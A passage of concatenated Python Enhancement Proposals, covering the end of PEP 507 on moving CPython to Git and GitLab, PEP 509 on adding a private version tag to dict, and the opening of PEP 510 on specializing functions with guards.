but proposes an open source alternative to GitHub and omits the
proposal to run Phabricator. As with PEP 481, this particular PEP is
offered as an alternative to PEP 474 and PEP 462.
Rationale
CPython is an open source project which relies on a number of
volunteers donating their time. As with any healthy, vibrant open
source project, it relies on attracting new volunteers as well as
retaining existing developers. Given that volunteer time is the most
scarce resource, providing a process that maximizes the efficiency of
contributors and reduces the friction for contributions, is of vital
importance for the long-term health of the project.
The current tool chain of the CPython project is a custom and unique
combination of tools. This has two critical implications:
The unique nature of the tool chain means that contributors must
remember or relearn, the process, workflow, and tools whenever they
contribute to CPython, without the advantage of leveraging long-term
memory and familiarity they retain by working with other projects in
the FLOSS ecosystem. The knowledge they gain in working with
CPython is unlikely to be applicable to other projects.
The burden on the Python/PSF infrastructure team is much greater in
order to continue to maintain custom tools, improve them over time,
fix bugs, address security issues, and more generally adapt to new
standards in online software development with global collaboration.
These limitations act as a barrier to contribution both for highly
engaged contributors (e.g. core Python developers) and especially for
more casual “drive-by” contributors, who care more about getting their
bug fix than learning a new suite of tools and workflows.
By proposing the adoption of both a different version control system
and a modern, well-maintained hosting solution, this PEP addresses
these limitations. It aims to enable a modern, well-understood
process that will carry CPython development for many years.
Version Control System
Currently the CPython and supporting repositories use Mercurial. As a
modern distributed version control system, it has served us well since
the migration from Subversion. However, when evaluating the VCS we
must consider the capabilities of the VCS itself as well as the
network effect and mindshare of the community around that VCS.
There are really only two real options for this, Mercurial and Git.
The technical capabilities of the two systems are largely equivalent,
therefore this PEP instead focuses on their social aspects.
It is not possible to get exact numbers for the number of projects or
people which are using a particular VCS, however we can infer this by
looking at several sources of information for what VCS projects are
using.
The Open Hub (previously Ohloh) statistics [1] show that
37% of the repositories indexed by The Open Hub are using Git (second
only to Subversion which has 48%) while Mercurial has just 2%, beating
only Bazaar which has 1%. This has Git being just over 18 times as
popular as Mercurial on The Open Hub.
Another source of information on VCS popularity is PyPI itself. This
source is more targeted at the Python community itself since it
represents projects developed for Python. Unfortunately PyPI does not
have a standard location for representing this information, so this
requires manual processing. If we limit our search to the top 100
projects on PyPI (ordered by download counts) we can see that 62% of
them use Git, while 22% of them use Mercurial, and 13% use something
else. This has Git being just under 3 times as popular as Mercurial
for the top 100 projects on PyPI.
These numbers back up the anecdotal evidence for Git as the far more
popular DVCS for open source projects. Choosing the more popular VCS
has a number of positive benefits.
For new contributors it increases the likelihood that they will have already
learned the basics of Git as part of working with another project or if they
are just now learning Git, that they’ll be able to take that knowledge and
apply it to other projects. Additionally a larger community means more people
writing how to guides, answering questions, and writing articles about Git
which makes it easier for a new user to find answers and information about the
tool they are trying to learn and use. Given its popularity, there may also
be more auxiliary tooling written around Git. This increases options for
everything from GUI clients, helper scripts, repository hosting, etc.
Further, the adoption of Git as the proposed back-end repository
format doesn’t prohibit the use of Mercurial by fans of that VCS!
Mercurial users have the [2] plugin which allows them to push
and pull from a Git server using the Mercurial front-end. It’s a
well-maintained and highly functional plugin that seems to be
well-liked by Mercurial users.
Repository Hosting
Where and how the official repositories for CPython are hosted is in
someways determined by the choice of VCS. With Git there are several
options. In fact, once the repository is hosted in Git, branches can
be mirrored in many locations, within many free, open, and proprietary
code hosting sites.
It’s still important for CPython to adopt a single, official
repository, with a web front-end that allows for many convenient and
common interactions entirely through the web, without always requiring
local VCS manipulations. These interactions include as a minimum,
code review with inline comments, branch diffing, CI integration, and
auto-merging.
This PEP proposes to adopt a [3] instance, run within the
python.org domain, accessible to and with ultimate control from the
PSF and the Python infrastructure team, but donated, hosted, and
primarily maintained by GitLab, Inc.
Why GitLab? Because it is a fully functional Git hosting system, that
sports modern web interactions, software workflows, and CI
integration. GitLab’s Community Edition (CE) is open source software,
and thus is closely aligned with the principles of the CPython
community.
Code Review
Currently CPython uses a custom fork of Rietveld modified to not run
on Google App Engine and which is currently only really maintained by
one person. It is missing common features present in many modern code
review tools.
This PEP proposes to utilize GitLab’s built-in merge requests and
online code review features to facilitate reviews of all proposed
changes.
GitLab merge requests
The normal workflow for a GitLab hosted project is to submit a merge request
asking that a feature or bug fix branch be merged into a target branch,
usually one or more of the stable maintenance branches or the next-version
master branch for new features. GitLab’s merge requests are similar in form
and function to GitHub’s pull requests, so anybody who is already familiar
with the latter should be able to immediately utilize the former.
Once submitted, a conversation about the change can be had between the
submitter and reviewer. This includes both general comments, and inline
comments attached to a particular line of the diff between the source and
target branches. Projects can also be configured to automatically run
continuous integration on the submitted branch, the results of which are
readily visible from the merge request page. Thus both the reviewer and
submitter can immediately see the results of the tests, making it much easier
to only land branches with passing tests. Each new push to the source branch
(e.g. to respond to a commenter’s feedback or to fix a failing test) results
in a new run of the CI, so that the state of the request always reflects the
latest commit.
Merge requests have a fairly major advantage over the older “submit a patch to
a bug tracker” model. They allow developers to work completely within the VCS
using standard VCS tooling, without requiring the creation of a patch file or
figuring out the right location to upload the patch to. This lowers the
barrier for sending a change to be reviewed.
Merge requests are far easier to review. For example, they provide nice
syntax highlighted diffs which can operate in either unified or side by side
views. They allow commenting inline and on the merge request as a whole and
they present that in a nice unified way which will also hide comments which no
longer apply. Comments can be hidden and revealed.
Actually merging a merge request is quite simple, if the source branch applies
cleanly to the target branch. A core reviewer simply needs to press the
“Merge” button for GitLab to automatically perform the merge. The source
branch can be optionally rebased, and once the merge is completed, the source
branch can be automatically deleted.
GitLab also has a good workflow for submitting pull requests to a project
completely through their web interface. This would enable the Python
documentation to have “Edit on GitLab” buttons on every page and people who
discover things like typos, inaccuracies, or just want to make improvements to
the docs they are currently reading. They can simply hit that button and get
an in browser editor that will let them make changes and submit a merge
request all from the comfort of their browser.
Criticism
X is not written in Python
One feature that the current tooling (Mercurial, Rietveld) has is that the
primary language for all of the pieces are written in Python. This PEP
focuses more on the best tools for the job and not necessarily on the best
tools that happen to be written in Python. Volunteer time is the most
precious resource for any open source project and we can best respect and
utilize that time by focusing on the benefits and downsides of the tools
themselves rather than what language their authors happened to write them in.
One concern is the ability to modify tools to work for us, however one of the
Goals here is to not modify software to work for us and instead adapt
ourselves to a more standardized workflow. This standardization pays off in
the ability to re-use tools out of the box freeing up developer time to
actually work on Python itself as well as enabling knowledge sharing between
projects.
However, if we do need to modify the tooling, Git itself is largely written in
C the same as CPython itself. It can also have commands written for it using
any language, including Python. GitLab itself is largely written in Ruby and
since it is Open Source software, we would have the ability to submit merge
requests to the upstream Community Edition, albeit in language potentially
unfamiliar to most Python programmers.
Mercurial is better than Git
Whether Mercurial or Git is better on a technical level is a highly subjective
opinion. This PEP does not state whether the mechanics of Git or Mercurial
are better, and instead focuses on the network effect that is available for
either option. While this PEP proposes switching to Git, Mercurial users are
not left completely out of the loop. By using the hg-git extension for
Mercurial, working with server-side Git repositories is fairly easy and
straightforward.
CPython Workflow is too Complicated
One sentiment that came out of previous discussions was that the multi-branch
model of CPython was too complicated for GitLab style merge requests. This
PEP disagrees with that sentiment.
Currently any particular change requires manually creating a patch for 2.7 and
3.x which won’t change at all in this regards.
If someone submits a fix for the current stable branch (e.g. 3.5) the merge
request workflow can be used to create a request to merge the current stable
branch into the master branch, assuming there is no merge conflicts. As
always, merge conflicts must be manually and locally resolved. Because
developers also have the option of performing the merge locally, this
provides an improvement over the current situation where the merge must
always happen locally.
For fixes in the current development branch that must also be applied to
stable release branches, it is possible in many situations to locally cherry
pick and apply the change to other branches, with merge requests submitted for
each stable branch. It is also possible just cherry pick and complete the
merge locally. These are all accomplished with standard Git commands and
techniques, with the advantage that all such changes can go through the review
and CI test workflows, even for merges to stable branches. Minor changes may
be easily accomplished in the GitLab web editor.
No system can hide all the complexities involved in maintaining several long
lived branches. The only thing that the tooling can do is make it as easy as
possible to submit and commit changes.
Open issues
What level of hosted support will GitLab offer? The PEP author has been in
contact with the GitLab CEO, with positive interest on their part. The
details of the hosting offer would have to be discussed.
What happens to Roundup and do we switch to the GitLab issue tracker?
Currently, this PEP is not suggesting we move from Roundup to GitLab
issues. We have way too much invested in Roundup right now and migrating
the data would be a huge effort. GitLab does support webhooks, so we will
probably want to use webhooks to integrate merges and other events with
updates to Roundup (e.g. to include pointers to commits, close issues,
etc. similar to what is currently done).
What happens to wiki.python.org? Nothing! While GitLab does support wikis
in repositories, there’s no reason for us to migration our Moin wikis.
What happens to the existing GitHub mirrors? We’d probably want to
regenerate them once the official upstream branches are natively hosted in
Git. This may change commit ids, but after that, it should be easy to
mirror the official Git branches and repositories far and wide.
Where would the GitLab instance live? Physically, in whatever hosting
provider GitLab chooses. We would point gitlab.python.org (or
git.python.org?) to this host.
References
[1]
Open Hub Statistics
[2]
Hg-Git mercurial plugin
[3]
https://about.gitlab.com
Copyright
This document has been placed in the public domain.
| Rejected | PEP 507 – Migrate CPython to Git and GitLab | Process | This PEP proposes migrating the repository hosting of CPython and the
supporting repositories to Git. Further, it proposes adopting a
hosted GitLab instance as the primary way of handling merge requests,
code reviews, and code hosting. It is similar in intent to PEP 481
but proposes an open source alternative to GitHub and omits the
proposal to run Phabricator. As with PEP 481, this particular PEP is
offered as an alternative to PEP 474 and PEP 462. |
PEP 509 – Add a private version to dict
Author:
Victor Stinner <vstinner at python.org>
Status:
Superseded
Type:
Standards Track
Created:
04-Jan-2016
Python-Version:
3.6
Post-History:
08-Jan-2016,
11-Jan-2016,
14-Apr-2016,
19-Apr-2016
Superseded-By:
699
Resolution:
Python-Dev message
Table of Contents
Abstract
Rationale
Guard example
Usage of the dict version
Speedup method calls
Specialized functions using guards
Pyjion
Cython
Unladen Swallow
Changes
Backwards Compatibility
Implementation and Performance
Integer overflow
Alternatives
Expose the version at Python level as a read-only __version__ property
Add a version to each dict entry
Add a new dict subtype
Prior Art
Method cache and type version tag
Globals / builtins cache
Cached globals+builtins lookup
Guard against changing dict during iteration
PySizer
Discussion
Acceptance
Copyright
Abstract
Add a new private version to the builtin dict type, incremented at
each dictionary creation and at each dictionary change, to implement
fast guards on namespaces.
Rationale
In Python, the builtin dict type is used by many instructions. For
example, the LOAD_GLOBAL instruction looks up a variable in the
global namespace, or in the builtins namespace (two dict lookups).
Python uses dict for the builtins namespace, globals namespace, type
namespaces, instance namespaces, etc. The local namespace (function
namespace) is usually optimized to an array, but it can be a dict too.
Python is hard to optimize because almost everything is mutable: builtin
functions, function code, global variables, local variables, … can be
modified at runtime. Implementing optimizations respecting the Python
semantics requires to detect when “something changes”: we will call
these checks “guards”.
The speedup of optimizations depends on the speed of guard checks. This
PEP proposes to add a private version to dictionaries to implement fast
guards on namespaces.
Dictionary lookups can be skipped if the version does not change, which
is the common case for most namespaces. The version is globally unique,
so checking the version is also enough to verify that the namespace
dictionary was not replaced with a new dictionary.
When the dictionary version does not change, the performance of a guard
does not depend on the number of watched dictionary entries: the
complexity is O(1).
Example of optimization: copy the value of a global variable to function
constants. This optimization requires a guard on the global variable to
check if it was modified after it was copied. If the global variable is
not modified, the function uses the cached copy. If the global variable
is modified, the function uses a regular lookup, and maybe also
deoptimizes the function (to remove the overhead of the guard check for
next function calls).
See the 510 – Specialized functions with guards
for concrete usage of
guards to specialize functions and for a more general rationale on
Python static optimizers.
Guard example
Pseudo-code of a fast guard to check if a dictionary entry was modified
(created, updated or deleted) using a hypothetical
dict_get_version(dict) function:
UNSET = object()
class GuardDictKey:
def __init__(self, dict, key):
self.dict = dict
self.key = key
self.value = dict.get(key, UNSET)
self.version = dict_get_version(dict)
def check(self):
"""Return True if the dictionary entry did not change
and the dictionary was not replaced."""
# read the version of the dictionary
version = dict_get_version(self.dict)
if version == self.version:
# Fast-path: dictionary lookup avoided
return True
# lookup in the dictionary
value = self.dict.get(self.key, UNSET)
if value is self.value:
# another key was modified:
# cache the new dictionary version
self.version = version
return True
# the key was modified
return False
Usage of the dict version
Speedup method calls
Yury Selivanov wrote a patch to optimize method calls. The patch depends on the
“implement per-opcode cache in ceval” patch which requires dictionary
versions to invalidate the cache if the globals dictionary or the
builtins dictionary has been modified.
The cache also requires that the dictionary version is globally unique.
It is possible to define a function in a namespace and call it in a
different namespace, using exec() with the globals parameter for
example. In this case, the globals dictionary was replaced and the cache
must also be invalidated.
Specialized functions using guards
PEP 510 proposes an API to support
specialized functions with guards. It allows to implement static
optimizers for Python without breaking the Python semantics.
The fatoptimizer of the FAT
Python project
is an example of a static Python optimizer. It implements many
optimizations which require guards on namespaces:
Call pure builtins: to replace len("abc") with 3, guards on
builtins.__dict__['len'] and globals()['len'] are required
Loop unrolling: to unroll the loop for i in range(...): ...,
guards on builtins.__dict__['range'] and globals()['range']
are required
etc.
Pyjion
According of Brett Cannon, one of the two main developers of Pyjion,
Pyjion can benefit from dictionary version to implement optimizations.
Pyjion is a JIT compiler for
Python based upon CoreCLR (Microsoft .NET Core runtime).
Cython
Cython can benefit from dictionary version to implement optimizations.
Cython is an optimising static compiler for both
the Python programming language and the extended Cython programming
language.
Unladen Swallow
Even if dictionary version was not explicitly mentioned, optimizing
globals and builtins lookup was part of the Unladen Swallow plan:
“Implement one of the several proposed schemes for speeding lookups of
globals and builtins.” (source: Unladen Swallow ProjectPlan).
Unladen Swallow is a fork of CPython 2.6.1 adding a JIT compiler
implemented with LLVM. The project stopped in 2011: Unladen Swallow
Retrospective.
Changes
Add a ma_version_tag field to the PyDictObject structure with
the C type PY_UINT64_T, 64-bit unsigned integer. Add also a global
dictionary version.
Each time a dictionary is created, the global version is incremented and
the dictionary version is initialized to the global version.
Each time the dictionary content is modified, the global version must be
incremented and copied to the dictionary version. Dictionary methods
which can modify its content:
clear()
pop(key)
popitem()
setdefault(key, value)
__delitem__(key)
__setitem__(key, value)
update(...)
The choice of increasing or not the version when a dictionary method
does not change its content is left to the Python implementation. A
Python implementation can decide to not increase the version to avoid
dictionary lookups in guards. Examples of cases when dictionary methods
don’t modify its content:
clear() if the dict is already empty
pop(key) if the key does not exist
popitem() if the dict is empty
setdefault(key, value) if the key already exists
__delitem__(key) if the key does not exist
__setitem__(key, value) if the new value is identical to the
current value
update() if called without argument or if new values are identical
to current values
Setting a key to a new value equals to the old value is also considered
as an operation modifying the dictionary content.
Two different empty dictionaries must have a different version to be
able to identify a dictionary just by its version. It allows to verify
in a guard that a namespace was not replaced without storing a strong
reference to the dictionary. Using a borrowed reference does not work:
if the old dictionary is destroyed, it is possible that a new dictionary
is allocated at the same memory address. By the way, dictionaries don’t
support weak references.
The version increase must be atomic. In CPython, the Global Interpreter
Lock (GIL) already protects dict methods to make changes atomic.
Example using a hypothetical dict_get_version(dict) function:
>>> d = {}
>>> dict_get_version(d)
100
>>> d['key'] = 'value'
>>> dict_get_version(d)
101
>>> d['key'] = 'new value'
>>> dict_get_version(d)
102
>>> del d['key']
>>> dict_get_version(d)
103
The field is called ma_version_tag, rather than ma_version, to
suggest to compare it using version_tag == old_version_tag, rather
than version <= old_version which becomes wrong after an integer
overflow.
Backwards Compatibility
Since the PyDictObject structure is not part of the stable ABI and
the new dictionary version not exposed at the Python scope, changes are
backward compatible.
Implementation and Performance
The issue #26058: PEP 509: Add ma_version_tag to PyDictObject contains a patch implementing
this PEP.
On pybench and timeit microbenchmarks, the patch does not seem to add
any overhead on dictionary operations. For example, the following timeit
micro-benchmarks takes 318 nanoseconds before and after the change:
python3.6 -m timeit 'd={1: 0}; d[2]=0; d[3]=0; d[4]=0; del d[1]; del d[2]; d.clear()'
When the version does not change, PyDict_GetItem() takes 14.8 ns for
a dictionary lookup, whereas a guard check only takes 3.8 ns. Moreover,
a guard can watch for multiple keys. For example, for an optimization
using 10 global variables in a function, 10 dictionary lookups costs 148
ns, whereas the guard still only costs 3.8 ns when the version does not
change (39x as fast).
The fat module implements
such guards: fat.GuardDict is based on the dictionary version.
Integer overflow
The implementation uses the C type PY_UINT64_T to store the version:
a 64 bits unsigned integer. The C code uses version++. On integer
overflow, the version is wrapped to 0 (and then continues to be
incremented) according to the C standard.
After an integer overflow, a guard can succeed whereas the watched
dictionary key was modified. The bug only occurs at a guard check if
there are exactly 2 ** 64 dictionary creations or modifications
since the previous guard check.
If a dictionary is modified every nanosecond, 2 ** 64 modifications
takes longer than 584 years. Using a 32-bit version, it only takes 4
seconds. That’s why a 64-bit unsigned type is also used on 32-bit
systems. A dictionary lookup at the C level takes 14.8 ns.
A risk of a bug every 584 years is acceptable.
Alternatives
Expose the version at Python level as a read-only __version__ property
The first version of the PEP proposed to expose the dictionary version
as a read-only __version__ property at Python level, and also to add
the property to collections.UserDict (since this type must mimic
the dict API).
There are multiple issues:
To be consistent and avoid bad surprises, the version must be added to
all mapping types. Implementing a new mapping type would require extra
work for no benefit, since the version is only required on the
dict type in practice.
All Python implementations would have to implement this new property,
it gives more work to other implementations, whereas they may not use
the dictionary version at all.
Exposing the dictionary version at the Python level can lead the
false assumption on performances. Checking dict.__version__ at
the Python level is not faster than a dictionary lookup. A dictionary
lookup in Python has a cost of 48.7 ns and checking the version has a
cost of 47.5 ns, the difference is only 1.2 ns (3%):$ python3.6 -m timeit -s 'd = {str(i):i for i in range(100)}' 'd["33"] == 33'
10000000 loops, best of 3: 0.0487 usec per loop
$ python3.6 -m timeit -s 'd = {str(i):i for i in range(100)}' 'd.__version__ == 100'
10000000 loops, best of 3: 0.0475 usec per loop
The __version__ can be wrapped on integer overflow. It is error
prone: using dict.__version__ <= guard_version is wrong,
dict.__version__ == guard_version must be used instead to reduce
the risk of bug on integer overflow (even if the integer overflow is
unlikely in practice).
Mandatory bikeshedding on the property name:
__cache_token__: name proposed by Alyssa Coghlan, name coming from
abc.get_cache_token().
__version__
__version_tag__
__timestamp__
Add a version to each dict entry
A single version per dictionary requires to keep a strong reference to
the value which can keep the value alive longer than expected. If we add
also a version per dictionary entry, the guard can only store the entry
version (a simple integer) to avoid the strong reference to the value:
only strong references to the dictionary and to the key are needed.
Changes: add a me_version_tag field to the PyDictKeyEntry
structure, the field has the C type PY_UINT64_T. When a key is
created or modified, the entry version is set to the dictionary version
which is incremented at any change (create, modify, delete).
Pseudo-code of a fast guard to check if a dictionary key was modified
using hypothetical dict_get_version(dict) and
dict_get_entry_version(dict) functions:
UNSET = object()
class GuardDictKey:
def __init__(self, dict, key):
self.dict = dict
self.key = key
self.dict_version = dict_get_version(dict)
self.entry_version = dict_get_entry_version(dict, key)
def check(self):
"""Return True if the dictionary entry did not change
and the dictionary was not replaced."""
# read the version of the dictionary
dict_version = dict_get_version(self.dict)
if dict_version == self.version:
# Fast-path: dictionary lookup avoided
return True
# lookup in the dictionary to read the entry version
entry_version = get_dict_key_version(dict, key)
if entry_version == self.entry_version:
# another key was modified:
# cache the new dictionary version
self.dict_version = dict_version
self.entry_version = entry_version
return True
# the key was modified
return False
The main drawback of this option is the impact on the memory footprint.
It increases the size of each dictionary entry, so the overhead depends
on the number of buckets (dictionary entries, used or not used). For
example, it increases the size of each dictionary entry by 8 bytes on
64-bit system.
In Python, the memory footprint matters and the trend is to reduce it.
Examples:
PEP 393 – Flexible String Representation
PEP 412 – Key-Sharing Dictionary
Add a new dict subtype
Add a new verdict type, subtype of dict. When guards are needed,
use the verdict for namespaces (module namespace, type namespace,
instance namespace, etc.) instead of dict.
Leave the dict type unchanged to not add any overhead (CPU, memory
footprint) when guards are not used.
Technical issue: a lot of C code in the wild, including CPython core,
expecting the exact dict type. Issues:
exec() requires a dict for globals and locals. A lot of code
use globals={}. It is not possible to cast the dict to a
dict subtype because the caller expects the globals parameter
to be modified (dict is mutable).
C functions call directly PyDict_xxx() functions, instead of calling
PyObject_xxx() if the object is a dict subtype
PyDict_CheckExact() check fails on dict subtype, whereas some
functions require the exact dict type.
Python/ceval.c does not completely supports dict subtypes for
namespaces
The exec() issue is a blocker issue.
Other issues:
The garbage collector has a special code to “untrack” dict
instances. If a dict subtype is used for namespaces, the garbage
collector can be unable to break some reference cycles.
Some functions have a fast-path for dict which would not be taken
for dict subtypes, and so it would make Python a little bit
slower.
Prior Art
Method cache and type version tag
In 2007, Armin Rigo wrote a patch to implement a cache of methods. It
was merged into Python 2.6. The patch adds a “type attribute cache
version tag” (tp_version_tag) and a “valid version tag” flag to
types (the PyTypeObject structure).
The type version tag is not exposed at the Python level.
The version tag has the C type unsigned int. The cache is a global
hash table of 4096 entries, shared by all types. The cache is global to
“make it fast, have a deterministic and low memory footprint, and be
easy to invalidate”. Each cache entry has a version tag. A global
version tag is used to create the next version tag, it also has the C
type unsigned int.
By default, a type has its “valid version tag” flag cleared to indicate
that the version tag is invalid. When the first method of the type is
cached, the version tag and the “valid version tag” flag are set. When a
type is modified, the “valid version tag” flag of the type and its
subclasses is cleared. Later, when a cache entry of these types is used,
the entry is removed because its version tag is outdated.
On integer overflow, the whole cache is cleared and the global version
tag is reset to 0.
See Method cache (issue #1685986) and Armin’s method cache
optimization updated for Python 2.6 (issue #1700288).
Globals / builtins cache
In 2010, Antoine Pitrou proposed a Globals / builtins cache (issue
#10401) which adds a private
ma_version field to the PyDictObject structure (dict type),
the field has the C type Py_ssize_t.
The patch adds a “global and builtin cache” to functions and frames, and
changes LOAD_GLOBAL and STORE_GLOBAL instructions to use the
cache.
The change on the PyDictObject structure is very similar to this
PEP.
Cached globals+builtins lookup
In 2006, Andrea Griffini proposed a patch implementing a Cached
globals+builtins lookup optimization. The patch adds a private
timestamp field to the PyDictObject structure (dict type),
the field has the C type size_t.
Thread on python-dev: About dictionary lookup caching
(December 2006).
Guard against changing dict during iteration
In 2013, Serhiy Storchaka proposed Guard against changing dict during
iteration (issue #19332) which
adds a ma_count field to the PyDictObject structure (dict
type), the field has the C type size_t. This field is incremented
when the dictionary is modified.
PySizer
PySizer: a memory profiler for Python,
Google Summer of Code 2005 project by Nick Smallbone.
This project has a patch for CPython 2.4 which adds key_time and
value_time fields to dictionary entries. It uses a global
process-wide counter for dictionaries, incremented each time that a
dictionary is modified. The times are used to decide when child objects
first appeared in their parent objects.
Discussion
Thread on the mailing lists:
python-dev: Updated PEP 509
python-dev: RFC: PEP 509: Add a private version to dict
python-dev: PEP 509: Add a private version to dict
(January 2016)
python-ideas: RFC: PEP: Add dict.__version__
(January 2016)
Acceptance
The PEP was accepted on 2016-09-07 by Guido van Rossum.
The PEP implementation has since been committed to the repository.
Copyright
This document has been placed in the public domain.
| Superseded | PEP 509 – Add a private version to dict | Standards Track | Add a new private version to the builtin dict type, incremented at
each dictionary creation and at each dictionary change, to implement
fast guards on namespaces. |
PEP 510 – Specialize functions with guards
Author:
Victor Stinner <vstinner at python.org>
Status:
Rejected
Type:
Standards Track
Created:
04-Jan-2016
Python-Version:
3.6
Table of Contents
Rejection Notice
Abstract
Rationale
Python semantics
Why not a JIT compiler?
Examples
Hypothetical myoptimizer module
Using bytecode
Using builtin function
Choose the specialized code
Changes
Function guard
Specialized code
Function methods
PyFunction_Specialize
PyFunction_GetSpecializedCodes
PyFunction_GetSpecializedCode
PyFunction_RemoveSpecialized
PyFunction_RemoveAllSpecialized
Benchmark
Implementation
Other implementations of Python
Discussion
Copyright
Rejection Notice
This PEP was rejected by its author since the design didn’t show any
significant speedup, but also because of the lack of time to implement
the most advanced and complex optimizations.
Abstract
Add functions to the Python C API to specialize pure Python functions:
add specialized codes with guards. It allows to implement static
optimizers respecting the Python semantics.
Rationale
Python semantics
Python is hard to optimize because almost everything is mutable: builtin
functions, function code, global variables, local variables, … can be
modified at runtime. Implement optimizations respecting the Python
semantics requires to detect when “something changes”, we will call these
checks “guards”.
This PEP proposes to add a public API to the Python C API to add
specialized codes with guards to a function. When the function is
called, a specialized code is used if nothing changed, otherwise use the
original bytecode.
Even if guards help to respect most parts of the Python semantics, it’s
hard to optimize Python without making subtle changes on the exact
behaviour. CPython has a long history and many applications rely on
implementation details. A compromise must be found between “everything
is mutable” and performance.
Writing an optimizer is out of the scope of this PEP.
Why not a JIT compiler?
There are multiple JIT compilers for Python actively developed:
PyPy
Pyston
Numba
Pyjion
Numba is specific to numerical computation. Pyston and Pyjion are still
young. PyPy is the most complete Python interpreter, it is generally
faster than CPython in micro- and many macro-benchmarks and has a very
good compatibility with CPython (it respects the Python semantics).
There are still issues with Python JIT compilers which avoid them to be
widely used instead of CPython.
Many popular libraries like numpy, PyGTK, PyQt, PySide and wxPython are
implemented in C or C++ and use the Python C API. To have a small memory
footprint and better performances, Python JIT compilers do not use
reference counting to use a faster garbage collector, do not use C
structures of CPython objects and manage memory allocations differently.
PyPy has a cpyext module which emulates the Python C API but it has
worse performances than CPython and does not support the full Python C
API.
New features are first developed in CPython. In January 2016, the
latest CPython stable version is 3.5, whereas PyPy only supports Python
2.7 and 3.2, and Pyston only supports Python 2.7.
Even if PyPy has a very good compatibility with Python, some modules are
still not compatible with PyPy: see PyPy Compatibility Wiki. The incomplete
support of the Python C API is part of this problem. There are also
subtle differences between PyPy and CPython like reference counting:
object destructors are always called in PyPy, but can be called “later”
than in CPython. Using context managers helps to control when resources
are released.
Even if PyPy is much faster than CPython in a wide range of benchmarks,
some users still report worse performances than CPython on some specific
use cases or unstable performances.
When Python is used as a scripting program for programs running less
than 1 minute, JIT compilers can be slower because their startup time is
higher and the JIT compiler takes time to optimize the code. For
example, most Mercurial commands take a few seconds.
Numba now supports ahead of time compilation, but it requires decorator
to specify arguments types and it only supports numerical types.
CPython 3.5 has almost no optimization: the peephole optimizer only
implements basic optimizations. A static compiler is a compromise
between CPython 3.5 and PyPy.
Note
There was also the Unladen Swallow project, but it was abandoned in
2011.
Examples
Following examples are not written to show powerful optimizations
promising important speedup, but to be short and easy to understand,
just to explain the principle.
Hypothetical myoptimizer module
Examples in this PEP uses a hypothetical myoptimizer module which
provides the following functions and types:
specialize(func, code, guards): add the specialized code code
with guards guards to the function func
get_specialized(func): get the list of specialized codes as a list
of (code, guards) tuples where code is a callable or code object
and guards is a list of a guards
GuardBuiltins(name): guard watching for
builtins.__dict__[name] and globals()[name]. The guard fails
if builtins.__dict__[name] is replaced, or if globals()[name]
is set.
Using bytecode
Add specialized bytecode where the call to the pure builtin function
chr(65) is replaced with its result "A":
import myoptimizer
def func():
return chr(65)
def fast_func():
return "A"
myoptimizer.specialize(func, fast_func.__code__,
[myoptimizer.GuardBuiltins("chr")])
del fast_func
Example showing the behaviour of the guard:
print("func(): %s" % func())
print("#specialized: %s" % len(myoptimizer.get_specialized(func)))
print()
import builtins
builtins.chr = lambda obj: "mock"
print("func(): %s" % func())
print("#specialized: %s" % len(myoptimizer.get_specialized(func)))
Output:
func(): A
#specialized: 1
func(): mock
#specialized: 0
The first call uses the specialized bytecode which returns the string
"A". The second call removes the specialized code because the
builtin chr() function was replaced, and executes the original
bytecode calling chr(65).
On a microbenchmark, calling the specialized bytecode takes 88 ns,
whereas the original function takes 145 ns (+57 ns): 1.6 times as fast.
Using builtin function
Add the C builtin chr() function as the specialized code instead of
a bytecode calling chr(obj):
import myoptimizer
def func(arg):
return chr(arg)
myoptimizer.specialize(func, chr,
[myoptimizer.GuardBuiltins("chr")])
Example showing the behaviour of the guard:
print("func(65): %s" % func(65))
print("#specialized: %s" % len(myoptimizer.get_specialized(func)))
print()
import builtins
builtins.chr = lambda obj: "mock"
print("func(65): %s" % func(65))
print("#specialized: %s" % len(myoptimizer.get_specialized(func)))
Output:
func(): A
#specialized: 1
func(): mock
#specialized: 0
The first call calls the C builtin chr() function (without creating
a Python frame). The second call removes the specialized code because
the builtin chr() function was replaced, and executes the original
bytecode.
On a microbenchmark, calling the C builtin takes 95 ns, whereas the
original bytecode takes 155 ns (+60 ns): 1.6 times as fast. Calling
directly chr(65) takes 76 ns.
Choose the specialized code
Pseudo-code to choose the specialized code to call a pure Python
function:
def call_func(func, args, kwargs):
specialized = myoptimizer.get_specialized(func)
nspecialized = len(specialized)
index = 0
while index < nspecialized:
specialized_code, guards = specialized[index]
for guard in guards:
check = guard(args, kwargs)
if check:
break
if not check:
# all guards succeeded:
# use the specialized code
return specialized_code
elif check == 1:
# a guard failed temporarily:
# try the next specialized code
index += 1
else:
assert check == 2
# a guard will always fail:
# remove the specialized code
del specialized[index]
# if a guard of each specialized code failed, or if the function
# has no specialized code, use original bytecode
code = func.__code__
Changes
Changes to the Python C API:
Add a PyFuncGuardObject object and a PyFuncGuard_Type type
Add a PySpecializedCode structure
Add the following fields to the PyFunctionObject structure:Py_ssize_t nb_specialized;
PySpecializedCode *specialized;
Add function methods:
PyFunction_Specialize()
PyFunction_GetSpecializedCodes()
PyFunction_GetSpecializedCode()
PyFunction_RemoveSpecialized()
PyFunction_RemoveAllSpecialized()
None of these function and types are exposed at the Python level.
All these additions are explicitly excluded of the stable ABI.
When a function code is replaced (func.__code__ = new_code), all
specialized codes and guards are removed.
Function guard
Add a function guard object:
typedef struct {
PyObject ob_base;
int (*init) (PyObject *guard, PyObject *func);
int (*check) (PyObject *guard, PyObject **stack, int na, int nk);
} PyFuncGuardObject;
The init() function initializes a guard:
Return 0 on success
Return 1 if the guard will always fail: PyFunction_Specialize()
must ignore the specialized code
Raise an exception and return -1 on error
The check() function checks a guard:
Return 0 on success
Return 1 if the guard failed temporarily
Return 2 if the guard will always fail: the specialized code must
be removed
Raise an exception and return -1 on error
stack is an array of arguments: indexed arguments followed by (key,
value) pairs of keyword arguments. na is the number of indexed
arguments. nk is the number of keyword arguments: the number of (key,
value) pairs. stack contains na + nk * 2 objects.
Specialized code
Add a specialized code structure:
typedef struct {
PyObject *code; /* callable or code object */
Py_ssize_t nb_guard;
PyObject **guards; /* PyFuncGuardObject objects */
} PySpecializedCode;
Function methods
PyFunction_Specialize
Add a function method to specialize the function, add a specialized code
with guards:
int PyFunction_Specialize(PyObject *func,
PyObject *code, PyObject *guards)
If code is a Python function, the code object of the code function
is used as the specialized code. The specialized Python function must
have the same parameter defaults, the same keyword parameter defaults,
and must not have specialized code.
If code is a Python function or a code object, a new code object is
created and the code name and first line number of the code object of
func are copied. The specialized code must have the same cell
variables and the same free variables.
Result:
Return 0 on success
Return 1 if the specialization has been ignored
